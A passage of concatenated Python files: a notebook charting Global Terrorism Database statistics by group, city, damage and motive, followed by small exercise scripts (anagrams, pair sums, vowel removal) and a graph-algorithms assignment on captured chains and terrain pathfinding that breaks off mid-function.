'x': data_city['city'][0:5].values,
'y': data_city['value'][0:5].values,
'mode': 'markers',
'marker': {
'sizemode': 'area',
'sizeref': 'sizeref',
'size': data_city['value'][0:5]
}
}
]
iplot(data)
City_State = pd.merge(data_city, terror_filter, how='left', left_on='city', right_on='city')
City_State = City_State.drop_duplicates(subset='city', keep='first', inplace=False)
count = City_State['value'].values
m = folium.Map(location=[28,70], tiles="Mapbox Bright", zoom_start=4.5)
for i in range(0,5):
folium.Circle(
location=[City_State.iloc[i]['latitude'], City_State.iloc[i]['longitude']],
#location=[20, 81],
popup=City_State.iloc[i]['city'],
radius=int(count[i])*100,
color='crimson',
fill=True,
fill_color='crimson'
).add_to(m)
m
# Top Terrorist Groups
# ---
# In[ ]:
orgs = terror['gname'].value_counts().head(25).index
from mpl_toolkits.basemap import Basemap
import matplotlib.pyplot as plt
fig = plt.figure(figsize=(14, 10))
cmap = plt.get_cmap('coolwarm')
map = Basemap(projection='cyl')
map.drawmapboundary()
map.fillcontinents(color='lightgray', zorder=1)
org=['Taliban','Shining Path (SL)']
#plt.scatter(5,15,s=50000,cmap=cmap,color = 'lightblue',marker='o',
# alpha=0.5, zorder=10)
plt.text(-60,70,'Terrorist Groups',color='r',fontsize=15)
plt.text(-60,65,'---------------------',color='r',fontsize=15)
j=60
for i in range(25) :
if i > 0 :
plt.text(-60,j,orgs[i],color='darkblue',fontsize=13)
j = j - 6
plt.title('Top Terrorist Groups across the world')
plt.show()
# Lets analyze top 5 active terrorist organizations and their presence
# ---
# In[ ]:
#terror['claimmode_txt'].value_counts()
f, ax = plt.subplots(figsize=(9, 6))
sns.barplot( y = terror['gname'].value_counts().head(6).index,
x = terror['gname'].value_counts().head(6).values,
palette="GnBu_d")
ax.set_ylabel('')
ax.set_title('Active Terrorist Organizations' );
# 1) Taliban
# ---
# In[ ]:
terror_filter = terror[terror['gname'] == "Taliban"]
terror_filter = terror_filter.groupby(['country_txt','iyear'])['gname'].count().unstack()
terror_filter = terror_filter.sort_values([2016], ascending=False)
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(15, 5))
g = sns.heatmap(terror_filter[0:3],cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
# Taliban has waged a war against Afghanistan and the number of attacks have been increased in last few years
# ---
# 2) Shining Path (SL)
# ---
# In[ ]:
terror_filter = terror[terror['gname'] == "Shining Path (SL)"]
terror_filter = terror_filter.groupby(['country_txt','iyear'])['gname'].count().unstack()
terror_filter = terror_filter.sort_values([2016], ascending=False)
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(15, 5))
g = sns.heatmap(terror_filter[0:10],cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
# Peru suffered the most at the hand of Shining path during 80s to 90s
# ----
# 3) Islamic State of Iraq and the Levant (ISIL)
# ---
# In[ ]:
terror_filter = terror[terror['gname'] == "Islamic State of Iraq and the Levant (ISIL)"]
terror_filter = terror_filter.groupby(['country_txt','iyear'])['gname'].count().unstack()
terror_filter = terror_filter.sort_values([2016], ascending=False)
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(15,8 ))
g = sns.heatmap(terror_filter[0:20],annot=True,fmt="2.0f",cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
# We all know the origin of this terror group but ISIL has started waging war against the neighbouring european countries too . We see Belgium and Russia has seen 2 incident in 2016. France has seen 9 attacks in the year 2015
# ---
# 4) Farabundo Marti National Liberation Front (FMLN)
# ---
# In[ ]:
terror_filter = terror[terror['gname'] == "Farabundo Marti National Liberation Front (FMLN)"]
terror_filter = terror_filter.groupby(['country_txt','iyear'])['gname'].count().unstack()
terror_filter = terror_filter.sort_values([1991], ascending=False)
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(15, 5))
g = sns.heatmap(terror_filter[0:10],cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
# Farabundo Marti National Liberation Front (FMLN) had given tough time to El Salvador between 80s - 90s
# ---
# 5) Al-Shabaab
# ---
# In[ ]:
terror_filter = terror[terror['gname'] == "Al-Shabaab"]
terror_filter = terror_filter.groupby(['country_txt','iyear'])['gname'].count().unstack()
terror_filter = terror_filter.sort_values([2016], ascending=False)
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(15, 5))
g = sns.heatmap(terror_filter[0:10],cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
# Al-Shabaab is latest terrorist organization and is constantly targetting Somalia
# ---
# 6) Boko Haram
# ---
# In[ ]:
terror_filter = terror[terror['gname'] == "Boko Haram"]
terror_filter = terror_filter.groupby(['country_txt','iyear'])['gname'].count().unstack()
terror_filter = terror_filter.sort_values([2016], ascending=False)
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(15, 5))
g = sns.heatmap(terror_filter[0:10],cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
# Boko Haram has constantly targetted Nigeria in last few years
# ----
# Different modes used to assume responsibility of the attacks
# ----
# In[ ]:
#terror['claimmode_txt'].value_counts()
f, ax = plt.subplots(figsize=(9, 6))
sns.barplot( y = terror['claimmode_txt'].value_counts().index,
x = terror['claimmode_txt'].value_counts().values,
palette="GnBu_d")
ax.set_ylabel('')
ax.set_title('Different modes used to assume responsibility of the attacks by Terrorists' );
# Heatmap Visualization to show Terrorist organizations using above mediums to assume responsibility of their henius act against humanity
# ---
# In[ ]:
terror_filter = terror[['gname','claimmode_txt']]
terror_filter = terror_filter.groupby(['gname','claimmode_txt'])['gname'].count().unstack()
terror_filter = terror_filter.sort_values(['Personal claim','Posted to website, blog, etc.'], ascending=False)
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(8, 10))
g = sns.heatmap(terror_filter[0:20],cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
# Below top 4 Terrorist groups accepts their act personally or they have recruited educated young minds to post their act on Websites blog. whichever medium ensures spreading the news faster. <br>
# ---
#
# **1) Taliban <br>
# 2) Islamic State of Iraq and the Levant (ISIL) <br>
# 3) Al-Shabaab <br>
# 4) Tehrik-i-Taliban Pakistan(TTP)**
# Total confirmed fatalities as a direct result of attacks by Terrorists
# ---
# > **The number includes all victims and attackers who died as a direct result of the incident**
#
# In[ ]:
killed_terror = terror[['city','nkill']]
terror_filter = terror[['city','latitude','longitude']]
terror_filter = terror_filter[terror_filter['city']!='Unknown' ]
data = terror_filter[['city','latitude','longitude']]
terror_filter = terror_filter.drop_duplicates(subset=None, keep='first', inplace=False)
data_city = pd.DataFrame({
'city':killed_terror.dropna().groupby(['city'])['nkill'].sum().index,
'value':killed_terror.dropna().groupby(['city'])['nkill'].sum().values
})
data_city = data_city.sort_values(['value'], ascending=False)
data = [
{
'x': data_city['city'][0:20].values,
'y': data_city['value'][0:20].values,
'mode': 'markers',
'marker': {
'sizemode': 'area',
'sizeref': 'sizeref',
'size': data_city['value'][0:20]
}
}
]
iplot(data)
City_State = pd.merge(data_city, terror_filter, how='left', left_on='city', right_on='city')
City_State = City_State.drop_duplicates(subset='city', keep='first', inplace=False)
City_State = City_State.dropna()
count = City_State['value'].values
m = folium.Map(location=[28,2], tiles='stamentoner', zoom_start=2)
for i in range(0,100):
folium.Circle(
location=[City_State.iloc[i]['latitude'], City_State.iloc[i]['longitude']],
#location=[20, 81],
popup=City_State.iloc[i]['city'],
radius=int(count[i])*100,
color='crimson',
fill=True,
fill_color='crimson'
).add_to(m)
m
# Total number of injured
# ---
# In[ ]:
killed_terror = terror[['city','nwound']]
terror_filter = terror[['city','latitude','longitude']]
terror_filter = terror_filter[terror_filter['city']!='Unknown' ]
data = terror_filter[['city','latitude','longitude']]
terror_filter = terror_filter.drop_duplicates(subset=None, keep='first', inplace=False)
data_city = pd.DataFrame({
'city':killed_terror.dropna().groupby(['city'])['nwound'].sum().index,
'value':killed_terror.dropna().groupby(['city'])['nwound'].sum().values
})
data_city = data_city.sort_values(['value'], ascending=False)
data = [
{
'x': data_city['city'][0:20].values,
'y': data_city['value'][0:20].values,
'mode': 'markers',
'marker': {
'sizemode': 'area',
'sizeref': 'sizeref',
'size': data_city['value'][0:20]
}
}
]
iplot(data)
City_State = pd.merge(data_city, terror_filter, how='left', left_on='city', right_on='city')
City_State = City_State.drop_duplicates(subset='city', keep='first', inplace=False)
City_State = City_State.dropna()
count = City_State['value'].values
m = folium.Map(location=[28,2], tiles='stamentoner', zoom_start=2)
for i in range(0,50):
folium.Circle(
location=[City_State.iloc[i]['latitude'], City_State.iloc[i]['longitude']],
#location=[20, 81],
popup=City_State.iloc[i]['city'],
radius=int(count[i])*50,
color='crimson',
fill=True,
fill_color='crimson'
).add_to(m)
m
# Extent of Property Damage
# ----
# > (aggrgated damage from 1970 to 2016)
# In[ ]:
terror_filter1 = terror[terror['propextent_txt'] == "Catastrophic (likely > $1 billion)"]
terror_filter1 = terror_filter1[['country_txt','propvalue','iyear']]
terror_filter1 = terror_filter1.fillna(terror_filter1.propvalue.mean())
terror_filter = terror[terror['propextent_txt'] == "Major (likely > $1 million but < $1 billion)"]
terror_filter = terror_filter[['country_txt','propvalue','iyear']]
terror_filter = terror_filter.fillna(terror_filter.propvalue.mean())
terror_filter = terror_filter.append(terror_filter1)
terror_filter = terror_filter.groupby(['country_txt'])['propvalue'].sum()
data = dict(
type = 'choropleth',
locations = terror_filter.index,
locationmode = 'country names',
z = terror_filter.values,
text = terror_filter.index,
colorbar = {'title': 'Property Damage in US $'})
layout = dict( title = 'Extent of Property Damage in US $ across the world',
geo = dict(showframe = False,
projection = {'type' : 'Mercator'}))
choromap3 = go.Figure(data = [data],layout=layout)
iplot(choromap3)
# **cities and states from North America and Iraq are topping the list.**
# Extent of Property Damage over the Years across all the countries
# ----
# > Catastrophic (likely > $1 billion)
# In[ ]:
terror_filter = terror[terror['propextent_txt'] == "Catastrophic (likely > $1 billion)"]
terror_filter = terror_filter[['country_txt','propvalue','iyear']]
terror_filter = terror_filter.fillna(terror_filter.propvalue.mean())
#terror_filter = terror_filter.append(terror_filter1)
terror_filter = terror_filter.groupby(['country_txt','iyear'])['propvalue'].sum().unstack()
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(12,3))
g = sns.heatmap(terror_filter,cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
# **9/11 attack in USA in the Year 2001 is the deadliest attack ever since 1970 **
# > Major (likely > $1 million but < $1 billion)
# In[ ]:
terror_filter = terror[terror['propextent_txt'] == "Major (likely > $1 million but < $1 billion)"]
terror_filter = terror_filter[['country_txt','propvalue','iyear']]
terror_filter = terror_filter.fillna(terror_filter.propvalue.mean())
#terror_filter = terror_filter.append(terror_filter1)
terror_filter = terror_filter.groupby(['country_txt','iyear'])['propvalue'].sum().unstack()
terror_filter = terror_filter.sort_values([2016], ascending=False)
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(15, 30))
g = sns.heatmap(terror_filter,cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
# Extent of Property Damage over the Years across the globe
# ----
# In[ ]:
terror_filter = terror[terror['propextent_txt'] == "Major (likely > $1 million but < $1 billion)"]
#terror_filter = terror[terror['country_txt'] == "United States"]
terror_filter = terror_filter[['city','gname','propvalue','iyear']]
terror_filter = terror_filter.fillna(terror_filter.propvalue.mean())
terror_filter = terror_filter.sort_values(['iyear'], ascending=False)
terror_filter = terror_filter.groupby(['iyear'])['propvalue'].sum()
data = [
{
'x': terror_filter.index,
'y': terror_filter.values,
'mode': 'lines',
'marker': {
'sizemode': 'area',
'sizeref': 'sizeref',
}
}
]
iplot(data)
# We see a ups and down in the graph , can we assume that great amount time is spent by terrorist organizations for mass destruction just before the peaks in this graph ? I will leave this question unanswered at this moment as it requires a great deal of time to find the exact reason.
# In[ ]:
def text_process(mess):
    """Strip all punctuation characters from *mess* and return the result.

    :param mess: input string (e.g. a terror-incident motive description)
    :return: *mess* with every character in string.punctuation removed
    """
    # str.translate removes the punctuation in a single C-level pass instead
    # of building an intermediate list of characters and joining it
    return mess.translate(str.maketrans('', '', string.punctuation))
# Now just remove any stopwords
#return [word for word in nopunc.split() if word.lower() not in stopwords.words('english')]
df = terror[['motive','country_txt','iyear']]
df = df.dropna()
df = df.reset_index(drop=True)
df['motive'] = df['motive'].apply(text_process)
# Shifting interests of Terrorists thru Timeline of Wordclouds
# ----
# In[ ]:
years = [2009,2010,2011,2012,2013,2014,2015,2016]
plt.figure(figsize=(14,15))
gs = gridspec.GridSpec(4, 2)
for i, cn in enumerate(years):
ax = plt.subplot(gs[i])
df_country = df[df['iyear'] == cn]
country_motive = df_country['motive'].str.lower().str.cat(sep=' ')
words=nltk.tokenize.word_tokenize(country_motive)
word_dist = nltk.FreqDist(words)
stopwords = nltk.corpus.stopwords.words('english')
words_except_stop_dist = nltk.FreqDist(w for w in words if w not in stopwords)
wordcloud = WordCloud(stopwords=STOPWORDS,background_color='white').generate(" ".join(words_except_stop_dist))
ax.imshow(wordcloud)
ax.set_title('Year ' + str(cn) + ' at a glance' )
ax.axis('off')
# Motive behind attacks on USA over the years (1970 to 2016 aggregated)
# ---
# In[ ]:
df_country = df[df['country_txt'] == 'United States']
#df_country = df[df['iyear'] == 2014]
country_motive = df_country['motive'].str.lower().str.cat(sep=' ')
words=nltk.tokenize.word_tokenize(country_motive)
word_dist = nltk.FreqDist(words)
stopwords = nltk.corpus.stopwords.words('english')
words_except_stop_dist = nltk.FreqDist(w for w in words if w not in stopwords)
wordcloud = WordCloud(stopwords=STOPWORDS,background_color='white').generate(" ".join(words_except_stop_dist))
plt.imshow(wordcloud)
fig=plt.gcf()
fig.set_size_inches(14,6)
plt.axis('off')
plt.show()
# USA from 2011 to 2016
# ---
# In[ ]:
years = [2011,2012,2013,2014,2015,2016]
df_country = df[df['country_txt'] == 'United States']
plt.figure(figsize=(14,15))
gs = gridspec.GridSpec(3, 2)
for i, cn in enumerate(years):
ax = plt.subplot(gs[i])
df_time = df_country[df_country['iyear'] == cn]
country_motive = df_time['motive'].str.lower().str.cat(sep=' ')
words=nltk.tokenize.word_tokenize(country_motive)
word_dist = nltk.FreqDist(words)
stopwords = nltk.corpus.stopwords.words('english')
words_except_stop_dist = nltk.FreqDist(w for w in words if w not in stopwords)
wordcloud = WordCloud(stopwords=STOPWORDS,background_color='white').generate(" ".join(words_except_stop_dist))
ax.imshow(wordcloud)
ax.set_title('Year ' + str(cn) + ' at a glance' )
ax.axis('off')
# Motive behind attacks on India over the years (1970 to 2016 aggregated)
# ---
# In[ ]:
df_country = df[df['country_txt'] == 'India']
country_motive = df_country['motive'].str.lower().str.cat(sep=' ')
words=nltk.tokenize.word_tokenize(country_motive)
word_dist = nltk.FreqDist(words)
stopwords = nltk.corpus.stopwords.words('english')
words_except_stop_dist = nltk.FreqDist(w for w in words if w not in stopwords)
wordcloud = WordCloud(stopwords=STOPWORDS,background_color='white').generate(" ".join(words_except_stop_dist))
plt.imshow(wordcloud)
fig=plt.gcf()
fig.set_size_inches(14,6)
plt.axis('off')
plt.show()
# India from 2011 to 2016
# ----
# In[ ]:
years = [2011,2012,2013,2014,2015,2016]
df_country = df[df['country_txt'] == 'India']
plt.figure(figsize=(14,9))
gs = gridspec.GridSpec(3, 2)
for i, cn in enumerate(years):
ax = plt.subplot(gs[i])
df_time = df_country[df_country['iyear'] == cn]
country_motive = df_time['motive'].str.lower().str.cat(sep=' ')
words=nltk.tokenize.word_tokenize(country_motive)
word_dist = nltk.FreqDist(words)
stopwords = nltk.corpus.stopwords.words('english')
words_except_stop_dist = nltk.FreqDist(w for w in words if w not in stopwords)
wordcloud = WordCloud(stopwords=STOPWORDS,background_color='white').generate(" ".join(words_except_stop_dist))
ax.imshow(wordcloud)
ax.set_title('Year ' + str(cn) + ' at a glance' )
ax.axis('off')
# Maoist forces are in effect after 2014 , which is exactly when India saw change in hand at central government after a decade.
# ---
# Suicide attacks conducted by various Terrorist organizations
# ---
# In[ ]:
terror_filter = terror[terror['suicide'] == 1]
terror_filter = terror_filter.groupby(['gname','iyear'])['gname'].count().unstack()
terror_filter = terror_filter[[2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,2011,2012,2012,2013,2014,2015,2016]]
terror_filter = terror_filter.sort_values([2016], ascending=False)
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(15, 10))
g = sns.heatmap(terror_filter[0:10],annot=True,fmt="2.0f",cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
# ISIL, Boko Haram and the Taliban are among the deadliest organizations the world has ever witnessed. Look at the increasing number of suicide attacks from 2013 to 2016, which is a worrying trend and likely to increase further.<br>
# ----
# Why are these organizations deadliest ?<br>
# ---
# > if these terrorist organizations have managed to brainwash people in great numbers to make them believe that their sacrifice will earn them a position in Heaven then just imagine in coming years they will succeed in building a big army which will be ready to lay down their life for their cause.
#
# To be continued
|
bfd2b36071000ac3d4d69251e4a3d0105cee316e | Ron-Chang/MyNotebook | /Coding/Python/Ron/Trials_and_Materials/sameLetters_rearrange.py | 1,087 | 4.1875 | 4 | """
What is an anagram?
Well, two words are anagrams of each other if they both contain the same letters.
For example:
anagrams('abba', ['aabb', 'abcd', 'bbaa', 'dada']) => ['aabb', 'bbaa']
anagrams('racer', ['crazer', 'carer', 'racar', 'caers', 'racer']) => ['carer', 'racer']
anagrams('laser', ['lazing', 'lazy', 'lacer']) => []
"""
def isCorrect(word, key):
    """Return True if `key` is an anagram of `word` (case-sensitive).

    Two strings are anagrams when every character occurs the same number of
    times in both, i.e. their character multisets match. Comparing the
    sorted forms checks exactly that in one step, replacing the original
    per-character count comparison (which was behaviorally equivalent but
    O(len(word) * len(key)) and harder to follow).

    :param word: reference string
    :param key: candidate string to test against `word`
    :return: True when `key` is an anagram of `word`, False otherwise
    """
    return sorted(word) == sorted(key)
def anagrams(word, words):
    """Return every candidate in `words` that is an anagram of `word`.

    :param word: reference string
    :param words: list of candidate strings
    :return: list of the candidates that pass the anagram check, in order
    """
    # filter the candidate list through the anagram predicate
    return [candidate for candidate in words if isCorrect(word, candidate)]
# clever way
# def anagrams(word, words):
#     return list(filter(lambda x: sorted(word.lower())==sorted(x.lower()),words))
# NOTE(review): x, y, m, n below are never used afterwards - leftover scratch data
x, y = "aaddc", "acdda"
m, n = "asda", "afdg"
# expected output: ['aabb', 'bbaa']
foo = anagrams('abba', ['aabb', 'abcd', 'bbaa', 'dada'])
print(foo)
# expected output: ['carer', 'racer']
zoo = anagrams('racer', ['crazer', 'carer', 'racar', 'caers', 'racer'])
print(zoo)
|
f15bbfbf6221e14d9ec7de42756020152cf3b2ad | alinanananana/- | /lab3-5.py | 280 | 3.828125 | 4 | surname = input()
# Read the user's first name and group ID from stdin (surname was read on the
# preceding line)
name = input()
group = input()
# Greet the user by surname, name and group (user-facing text is in Russian)
print('Привет,',surname, name,'из группы', group + '!')
print('Введи свою электронную почту?')
mail = input()
# Build a string from: first 5 chars of the surname, first 5 chars of the name
# repeated twice, and first 5 chars of the e-mail repeated three times, all
# lower-cased
print(surname.lower()[:5] + 2 * (name.lower()[:5]) + 3 * mail.lower()[:5])
|
e6854655aa70ddfc032152b3ff593b100e0a33d5 | sarkarChanchal105/Coding | /misc/count-pairs-with-given-sum.py | 1,529 | 4.34375 | 4 | """
https://www.geeksforgeeks.org/count-pairs-with-given-sum/
Count pairs with given sum
Last Updated: 04-06-2020
Given an array of integers, and a number ‘sum’, find the number of pairs of integers in the array whose sum is equal to ‘sum’.
Examples:
Input : arr[] = {1, 5, 7, -1},
sum = 6
Output : 2
Pairs with sum 6 are (1, 5) and (7, -1)
Input : arr[] = {1, 5, 7, -1, 5},
sum = 6
Output : 3
Pairs with sum 6 are (1, 5), (7, -1) &
(1, 5)
Input : arr[] = {1, 1, 1, 1},
sum = 2
Output : 6
There are 3! pairs with sum 2.
Input : arr[] = {10, 12, 10, 15, -1, 7, 6,
5, 4, 2, 1, 1, 1},
sum = 11
Output : 9
Expected time complexity O(n)
"""
def getPairsCount(arr, sum):
    """Count the unordered pairs of positions (i, j), i < j, with arr[i] + arr[j] == sum.

    Duplicates in `arr` produce multiple pairs (e.g. [1, 1, 1, 1] with
    sum 2 yields 6 pairs). Runs in O(n) using a frequency map.

    This fixes the original version, which counted every pair twice (once
    from each end) and also paired elements with themselves: for
    arr=[1, 5, 7, -1], sum=6 it printed 4 instead of the expected 2.
    The intermediate debug prints were removed; the final count is still
    printed and is now also returned.

    :param arr: list of integers (may contain duplicates)
    :param sum: target pair sum (parameter name kept for interface
        compatibility even though it shadows the builtin)
    :return: number of unordered index pairs whose values add up to `sum`
    """
    # frequency map of the values in arr
    freq = {}
    for value in arr:
        freq[value] = freq.get(value, 0) + 1
    count = 0
    for value in arr:
        count += freq.get(sum - value, 0)
        # an element must not be paired with itself
        if sum - value == value:
            count -= 1
    # every pair was counted from both ends, so halve the total
    count = count // 2
    print(count)
    return count
# Example from the problem statement: 9 pairs summing to 11
arr = [10, 12, 10, 15, -1, 7, 6,5, 4, 2, 1, 1, 1]
sum=11
getPairsCount(arr,sum)
# NOTE(review): this arr/sum pair is overwritten below before being used -
# apparently leftover from an earlier experiment
arr = [1, 5, 7, -1, 5]
sum = 6
arr = [1, 6, 6, -1, 5,7]
sum = 12
getPairsCount(arr,sum)
|
73d9e33c9f7503f43ca41c746183eb8b3c5b7984 | hwakabh/codewars | /Python/7/DisemvowelTrolls/disemvowel_trolls.py | 392 | 4.0625 | 4 | import sys
def disemvowel(string):
    """Return *string* with all vowels (both cases) removed.

    :param string: input sentence; the parameter name shadows the builtin
        `string` module but is kept for interface compatibility
    :return: the input with every character in "aeiouAEIOU" dropped
    """
    # a single pass with a membership test replaces the original chain of
    # str.replace calls (which rescanned the whole string once per vowel)
    return ''.join(ch for ch in string if ch not in 'aeiouAEIOU')
if __name__ == "__main__":
if len(sys.argv) == 1:
inp = input('>>> Enter sentence to remove vowels: ')
print(disemvowel(string=inp))
else:
sys.exit(1)
|
7c3ebbbcb2936e97d871248215d8fb91f4c37297 | Dax246/FIT2004 | /Assignment 4/assignment4.py | 23,024 | 3.75 | 4 | """
This file contains the functions that solve question 1 and 2 from FIT2004 Assignment 4.
Graph class: Converts the vfile and efile into a graph that is stored using an edge list
captured_chains: Function which solves question 1
DFS: Runs depth first search
Terrain_pathfinding: Function which solves question 2
index_to_vehicle_type: Converts an index into the string that represents the vehicle type
Author: Damien Ambegoda (30594235)
Last modified: 3/11/2020
"""
from collections import deque
import re
from math import inf
import queue
class Graph:
    """Undirected graph built from a vertex file and an edge file.

    Attributes:
        vertex_properties: list where vertex_properties[i] is the integer
            property (e.g. stone colour) of the vertex with ID i.
        edge_list: adjacency list where edge_list[i] holds the IDs of all
            vertices adjacent to vertex i.
    """

    def __init__(self, vfile, efile):
        """Read the vertex and edge files and build the adjacency list.

        :param vfile: path to a text file whose first line is the number of
            vertices, followed by one "id property" pair per line.
        :param efile: path to a text file whose first line is the number of
            edges, followed by one "u v" pair per line, each describing an
            undirected edge between vertices u and v.
        Time Complexity: O(V + E) where V is the number of vertices in vfile
            and E is the number of edges in efile.
        """
        # 'with' guarantees the file is closed even if a parse error occurs
        with open(str(vfile)) as f:
            vertex_counter = int(f.readline())
            # each vertex ID indexes directly into both lists
            self.vertex_properties = [None] * vertex_counter
            self.edge_list = [[] for _ in range(vertex_counter)]
            for _ in range(vertex_counter):
                # each line is "id property"; split() is more robust than the
                # original regex and tolerates trailing whitespace/newlines
                vertex_id, vertex_property = f.readline().split()
                self.vertex_properties[int(vertex_id)] = int(vertex_property)
        with open(str(efile)) as f:
            edge_counter = int(f.readline())
            for _ in range(edge_counter):
                # store each undirected edge u-v in both adjacency lists
                u, v = f.readline().split()
                self.edge_list[int(u)].append(int(v))
                self.edge_list[int(v)].append(int(u))
def captured_chains(vfile, efile):
    """ Determine every captured chain on the board described by vfile/efile.

    A chain is a maximal group of directly connected vertices of the same
    colour; it is "captured" when no member of the chain is adjacent to an
    empty (colour 0) vertex. The files are converted to a graph via the
    Graph class and each chain is explored with depth first search (DFS).

    :param vfile: path to the vertex file (format described in Graph.__init__)
    :param efile: path to the edge file (format described in Graph.__init__)
    :return: list of captured chains, each chain being a list of vertex IDs
    Time Complexity: O(V + E) where V is the number of vertices in the vfile
    and E is the number of edges in the efile
    """
    # Graph class converts vfile and efile into a graph (edge-list form)
    graph = Graph(vfile, efile)
    # visited list is global so it can be accessed through any of the recursive DFS calls
    global visited
    visited = [0]*len(graph.vertex_properties)
    res = []
    # runs on every vertex which ensures that no vertex is skipped
    for vertex_index in range(len(visited)):
        # vertices may already have been visited as part of an earlier DFS, so
        # the visited list ensures no vertex is processed more than once
        if not visited[vertex_index]:
            # current_chain and captured_chain_check are global so they can be
            # accessed through the recursive DFS calls
            global current_chain
            current_chain = []
            global captured_chain_check
            # deque acts as a flag container: DFS pushes a marker when the chain is free
            captured_chain_check = deque()
            DFS(graph, vertex_index)
            # a non-empty chain with no "free" marker in the deque is captured
            if len(current_chain) != 0 and len(captured_chain_check) == 0:
                res.append(current_chain)
            captured_chain_check.clear()
    return res
def DFS(graph, vertex_ID):
    """Depth-first search that grows one same-coloured chain.

    Starting from vertex_ID, the search visits every directly-connected
    vertex of the same colour.  Instead of returning, it updates globals
    shared with captured_chains():
      visited              -- marks every vertex the search has touched
      current_chain        -- vertices accumulated into the current chain
      captured_chain_check -- receives a marker whenever any chain member
                              has an empty neighbour (chain is free)

    Time Complexity: O(V + E) over the input graph.
    """
    if visited[vertex_ID]:
        return
    visited[vertex_ID] = 1
    colour = graph.vertex_properties[vertex_ID]
    # Colour 0 means an empty vertex, which can never belong to a chain.
    if colour == 0:
        return
    touches_empty = False
    pending = deque()
    for neighbour in graph.edge_list[vertex_ID]:
        neighbour_colour = graph.vertex_properties[neighbour]
        # An empty neighbour frees the whole chain.
        if neighbour_colour == 0:
            touches_empty = True
        # A same-coloured neighbour extends the chain; queue it for DFS.
        if neighbour_colour == colour:
            pending.append(neighbour)
    if touches_empty:
        captured_chain_check.append('X')
    else:
        current_chain.append(vertex_ID)
    # Continue depth-first (pop from the right) until the chain is exhausted.
    while pending:
        DFS(graph, pending.pop())
def terrain_pathfinding(vfile, efile, crossing_time, transform_cost, start, end):
    """Find the fastest route from start to end over mixed terrain.

    Each vertex is split into three subvertices, one per vehicle form
    (0 = wheel, 1 = tank, 2 = hover).  Dijkstra's algorithm runs over the
    subvertex graph: stepping to a neighbour costs the time to cross the
    current vertex in the current form, plus transform_cost when the
    arrival form differs from the current one (no transform is charged on
    arrival at the end vertex, where the form no longer matters).

    Returns [shortest_time, path] where path is a list of
    (vertex_id, vehicle_form_name) tuples from start to end.

    Time Complexity: O(E * logV) where E is the number of edges in efile
    and V is the number of vertices in vfile.

    Changes from the original: the nine copy-pasted relaxation branches
    (3 source forms x 3 destination forms) are collapsed into one loop with
    the identical cost rule, and a local that shadowed the builtin `str`
    was renamed.
    """
    # No travel needed when the trip starts at its destination.
    if start == end:
        return (0, [])
    graph = Graph(vfile, efile)
    pqueue = queue.PriorityQueue()
    num_vertices = len(graph.vertex_properties)
    # distance_to_vertex[i][f]: best known time to arrive at vertex i in form f.
    distance_to_vertex = [[inf, inf, inf] for _ in range(num_vertices)]
    # The traveller starts in wheel form, so arriving "at the start" in tank
    # or hover form costs one transform.
    distance_to_vertex[start] = [0, transform_cost, transform_cost]
    # distance_through_vertex[i][f]: time to cross vertex i in form f.
    distance_through_vertex = [[inf, inf, inf] for _ in range(num_vertices)]
    visited = [[0, 0, 0] for _ in range(num_vertices)]
    # pred[i][f]: (previous vertex, previous form) on the best path to (i, f).
    pred = [[(None, None), (None, None), (None, None)] for _ in range(num_vertices)]
    # NOTE(review): this hardcodes vertex 0 as the start's predecessor.  It is
    # never dereferenced because path reconstruction stops once start is
    # appended, but (start, 0) looks like the intent -- confirm before relying
    # on pred[start].
    pred[start] = [(0, 0), (0, 0), (0, 0)]
    # Terrain property 0 is plain, 1 is hill, anything else is swamp.
    for i in range(num_vertices):
        if graph.vertex_properties[i] == 0:
            terrain = "plain"
        elif graph.vertex_properties[i] == 1:
            terrain = "hill"
        else:
            terrain = "swamp"
        distance_through_vertex[i] = [crossing_time["wheel"][terrain],
                                      crossing_time["tank"][terrain],
                                      crossing_time["hover"][terrain]]
    # Seed the priority queue with every subvertex.  O(V)
    for i in range(num_vertices):
        for j in range(3):
            pqueue.put((distance_to_vertex[i][j], i, j))
    # Main Dijkstra loop: stops once every form of the end vertex is settled,
    # at which point the first (cheapest) arrival is final.
    while not pqueue.empty() and visited[end] == [0, 0, 0]:
        # (arrival time, vertex id, vehicle form at that vertex)
        curr_distance_to, curr_vertex_ID, subvertex = pqueue.get()
        # Skip subvertices that are already settled ...
        if visited[curr_vertex_ID][subvertex] == 1:
            continue
        # ... and stale queue entries superseded by a later relaxation.
        if curr_distance_to != distance_to_vertex[curr_vertex_ID][subvertex]:
            continue
        visited[curr_vertex_ID][subvertex] = 1
        # Cost to reach any neighbour before a possible transform: time to
        # get here in this form plus time to drive across this vertex in it.
        base_cost = (distance_to_vertex[curr_vertex_ID][subvertex]
                     + distance_through_vertex[curr_vertex_ID][subvertex])
        # Tracks which (neighbour, form) pairs were relaxed so only those
        # get re-pushed onto the queue afterwards.
        relaxed_vertices = []
        for edge_index, edge_destination in enumerate(graph.edge_list[curr_vertex_ID]):
            # [destination, relaxed-flag for form 0, form 1, form 2]
            relaxed_vertices.append([edge_destination, 0, 0, 0])
            for dest_form in range(3):
                # A settled subvertex can no longer be relaxed.
                if visited[edge_destination][dest_form] == 1:
                    continue
                cost = base_cost
                # Changing form on arrival costs a transform, except at the
                # end vertex where the arrival form no longer matters.
